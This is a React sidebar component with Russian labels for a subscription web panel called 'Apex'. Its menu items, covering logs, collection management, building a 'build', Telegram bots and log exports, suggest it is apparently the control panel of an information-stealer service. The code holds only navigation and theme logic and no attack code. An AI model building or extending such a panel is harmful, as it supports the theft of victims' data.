import React, { useEffect, useState } from 'react';
import { NavLink, useNavigate } from 'react-router-dom';
import api, { cacheGet, cacheSet } from '../api';

const NAV = [
  { to: '/', end: true, label: 'Главная', icon: 'home', color: '#3B82F6' },
  { to: '/logs', label: 'Мои логи', icon: 'logs', color: '#22C55E' },
  { to: '/collection', label: 'Управление сбором', icon: 'bolt', color: '#F97316' },
  { to: '/builder', label: 'Собрать билд', icon: 'build', color: '#A855F7' },
  { to: '/filters', label: 'Фильтры', icon: 'filter', color: '#EAB308' },
  { to: '/telegram', label: 'Telegram боты', icon: 'tg', color: '#8B5CF6' },
  { to: '/stats', label: 'Статистика', icon: 'stats', color: '#06B6D4' },
  { to: '/exports', label: 'Выгрузки логов', icon: 'cloud', color: '#3B82F6' },
  { to: '/settings', label: 'Настройки', icon: 'gear', color: '#64748B' },
];

function Icon({ name }) {
  const common = { width: 18, height: 18, viewBox: '0 0 24 24', fill: 'none', stroke: 'currentColor', strokeWidth: 2 };
  switch (name) {
    case 'home':
      return <svg {...common}><path d="M3 11l9-8 9 8"/><path d="M5 10v10h14V10"/></svg>;
    case 'logs':
      return <svg {...common}><path d="M8 6h13M8 12h13M8 18h13"/><path d="M3 6h.01M3 12h.01M3 18h.01"/></svg>;
    case 'bolt':
      return <svg {...common}><path d="M13 2L3 14h9l-1 8 10-12h-9l1-8z"/></svg>;
    case 'build':
      return <svg {...common}><path d="M12 3v12"/><path d="M8 11l4 4 4-4"/><path d="M4 19h16"/></svg>;
    case 'filter':
      return <svg {...common}><path d="M4 4h16l-6 8v6l-4 2v-8L4 4z"/></svg>;
    case 'tg':
      return <svg {...common}><path d="M22 2L11 13"/><path d="M22 2L15 22l-4-9-9-4 20-7z"/></svg>;
    case 'stats':
      return <svg {...common}><path d="M4 19V5M10 19V9M16 19v-6M22 19V7"/></svg>;
    case 'cloud':
      return <svg {...common}><path d="M8 17H6a4 4 0 010-8 5 5 0 019.5-1.5A3.5 3.5 0 1118 17h-2"/><path d="M12 12v7M9 16l3 3 3-3"/></svg>;
    case 'gear':
      return <svg {...common}><circle cx="12" cy="12" r="3"/><path d="M12 1v2M12 21v2M4.22 4.22l1.42 1.42M18.36 18.36l1.42 1.42M1 12h2M21 12h2M4.22 19.78l1.42-1.42M18.36 5.64l1.42-1.42"/></svg>;
    case 'exit':
      return <svg {...common}><path d="M9 21H5a2 2 0 01-2-2V5a2 2 0 012-2h4"/><path d="M16 17l5-5-5-5M21 12H9"/></svg>;
    case 'sun':
      return <svg {...common}><circle cx="12" cy="12" r="4"/><path d="M12 2v2M12 20v2M4.93 4.93l1.41 1.41M17.66 17.66l1.41 1.41M2 12h2M20 12h2M4.93 19.07l1.41-1.41M17.66 6.34l1.41-1.41"/></svg>;
    case 'moon':
      return <svg {...common}><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg>;
    default:
      return null;
  }
}

export default function Sidebar() {
  const nav = useNavigate();
  const [me, setMe] = useState(() => cacheGet('me', { username: 'admin', plan: 'PRO', days_left: 29 }));
  const [theme, setTheme] = useState(() => localStorage.getItem('theme') || 'dark');

  useEffect(() => {
    api.get('/me').then((r) => {
      if (r.data && typeof r.data === 'object') {
        setMe(r.data);
        cacheSet('me', r.data);
      }
    }).catch(() => {});
  }, []);

  const toggleTheme = () => {
    const next = theme === 'dark' ? 'light' : 'dark';
    document.documentElement.dataset.theme = next;
    localStorage.setItem('theme', next);
    setTheme(next);
  };

  return (
    <aside className="rm-sidebar">
      <div className="rm-brand">
        <div className="rm-logo">A</div>
        <div className="rm-user-card">
          <div className="rm-user-row">
            <strong>{me.username || 'admin'}</strong>
            <span className="rm-pro">{me.plan || 'PRO'}</span>
          </div>
          <div className="rm-sub">
            осталось {me.days_left ?? 29} дней{' '}
            <button type="button" className="rm-link">продлить?</button>
          </div>
        </div>
      </div>

      <nav className="rm-nav">
        {NAV.map((item) => (
          <NavLink key={item.to} to={item.to} end={item.end} className={({ isActive }) => (isActive ? 'active' : '')}>
            <span className="rm-nav-ico" style={{ background: `${item.color}22`, color: item.color }}>
              <Icon name={item.icon} />
            </span>
            <span>{item.label}</span>
          </NavLink>
        ))}
        <button
          type="button"
          className="rm-logout"
          onClick={() => {
            localStorage.clear();
            nav('/login');
          }}
        >
          <span className="rm-nav-ico" style={{ background: 'rgba(239,68,68,.15)', color: '#EF4444' }}>
            <Icon name="exit" />
          </span>
          <span>Выход</span>
        </button>
        <button type="button" className="rm-theme-toggle" onClick={toggleTheme}>
          <span className="rm-nav-ico" style={{ background: 'rgba(234,179,8,.15)', color: '#EAB308' }}>
            <Icon name={theme === 'dark' ? 'sun' : 'moon'} />
          </span>
          <span>{theme === 'dark' ? 'Светлая тема' : 'Тёмная тема'}</span>
        </button>
      </nav>

      <div className="rm-side-foot">
        Спасибо за выбор <b>Apex</b>.{' '}
        <a href="https://t.me/" target="_blank" rel="noreferrer">поддержка</a>
      </div>
    </aside>
  );
}
